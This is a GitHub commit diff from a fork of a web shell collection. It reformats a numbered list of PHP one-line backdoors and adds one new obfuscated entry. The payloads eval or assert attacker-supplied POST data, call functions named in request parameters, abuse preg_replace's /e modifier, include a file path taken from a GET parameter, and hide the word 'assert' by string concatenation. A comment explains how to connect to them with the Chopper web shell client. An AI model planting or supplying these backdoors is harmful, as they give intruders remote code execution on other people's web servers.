forked from tennc/webshell
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
11 additions
and
9 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,13 +1,15 @@ | ||
[+]php一句话 | ||
|
||
1) <?php eval($_POST[sb]);?> | ||
2) <?php @eval($_POST[sb]);?> | ||
3) <?php assert($_POST[sb]);?> | ||
4) <?$_POST['sa']($_POST['sb']);?> | ||
5) <?$_POST['sa']($_POST['sb'],$_POST['sc'])?> | ||
6) <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?> | ||
1. <?php eval($_POST[sb]);?> | ||
2. <?php @eval($_POST[sb]);?> | ||
3. <?php assert($_POST[sb]);?> | ||
4. <?$_POST['sa']($_POST['sb']);?> | ||
5. <?$_POST['sa']($_POST['sb'],$_POST['sc'])?> | ||
6. <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?> | ||
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 | ||
<O>h=@eval($_POST[c]);</O> | ||
7) <script language="php">@eval($_POST[sb])</script> | ||
8) $filename=$_GET['xbid']; | ||
include ($filename); | ||
7. <script language="php">@eval($_POST[sb])</script> | ||
8. $filename=$_GET['xbid']; | ||
include ($filename); | ||
9. <?php | ||
$c='ass'.'ert';${c}($_POST[4]);?> |